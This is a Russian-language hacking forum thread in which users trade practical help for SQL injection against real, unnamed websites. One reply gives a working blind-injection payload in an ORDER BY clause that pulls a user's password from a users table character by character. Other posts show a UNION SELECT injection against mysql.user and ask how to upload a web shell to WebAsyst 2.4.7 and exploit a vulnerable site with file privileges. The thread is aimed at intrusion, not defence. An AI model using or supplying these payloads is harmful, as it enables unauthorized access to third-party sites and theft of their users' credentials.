17.05.2010, 17:05
|
|
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439
Репутация:
127
|
|
Сообщение от [R]eD
Имеется сайт, в нем скуля в .... ORDER BY $id
Переборка запроса вроде
Код:
(id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
работает.
Вопрос: как в таком случае использовать (UNION) SELECT? Или любой другой способ сделать выборку из бд? Ссылку в студию
|
|
|
17.05.2010, 17:07
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Сообщение от b82a
Ссылку в студию
К сожалению дать не могу, но тут и так все ясно...
Запрос там вида SELECT .... FROM .... ORDER BY $id
$id - не фильтрауется.
|
|
|
|
17.05.2010, 17:35
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от [R]eD
Имеется сайт, в нем скуля в .... ORDER BY $id
Переборка запроса вроде
Код:
(id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
работает.
Вопрос: как в таком случае использовать (UNION) SELECT? Или любой другой способ сделать выборку из бд? Все достаточно просто: с помощью подзапросов, вместо user() подставляешь запрос типа (SELECT+password+FROM+users+WHERE+userid='1') и таким образом запрос получается такой:
(id*IF(ASCII(SUBSTRING((SELECT+password+FROM+users +WHERE+userid='1'),1,1))=113,1,-1)), а далее посимвольно перебираешь остальную часть пароля
|
|
|
|
17.05.2010, 17:35
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
[R]eD, вместо user() запрос свой вставляй, типа select+table+where+id='5' только в () запрос возьми
|
|
|
|
17.05.2010, 18:21
|
|
Участник форума
Регистрация: 21.09.2008
Сообщений: 148
Провел на форуме:
678893
Репутация:
102
|
|
Интересуют методы заливки шелла на WebAsyst (v.2.4.7)
|
|
|
|
17.05.2010, 18:29
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
$mosConfig_user - joomla_user
$mosConfig_password - joomla_user_password
ребят я все правильно понял?  |
|
|
|
17.05.2010, 18:29
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
где по умолчанию находится админка в Vizzed Board?
Мож кто слышал про такой двиг, лично я с ним сталкиваюсь впервые=)
|
|
|
|
17.05.2010, 18:40
|
|
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
Провел на форуме:
559542
Репутация:
94
|
|
Провожу запрос вида
Код:
?id=-12+union+select+1,3,3,4,5,6,7 FROM mysql.user--+
ответ
Код:
SELECT command denied to user 'some_admin'@'localhost' for table 'user'
подскажите как обойтись без SELECT или что-нибудь другое. |
|
|
|
17.05.2010, 18:42
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от <Cyber-punk>
Провожу запрос вида
Код:
?id=-12+union+select+1,3,3,4,5,6,7 FROM mysql.user--+
ответ
Код:
SELECT command denied to user 'some_admin'@'localhost' for table 'user'
подскажите как обойтись без SELECT или что-нибудь другое.
обхода нет,твоему юзеру запрещено работать с базой mysql...
не редкость.
|
|
|
|
17.05.2010, 19:13
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
Есть уязвимый сайт, mysql 4-ветки, file_priv:Y
На сайте есть форум, как узнать его базу? Брут не помог.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [R]eD](/avatars/avatar26157.jpg?2147962){kind=avatar}
Похожие темы
Комбинированный вид
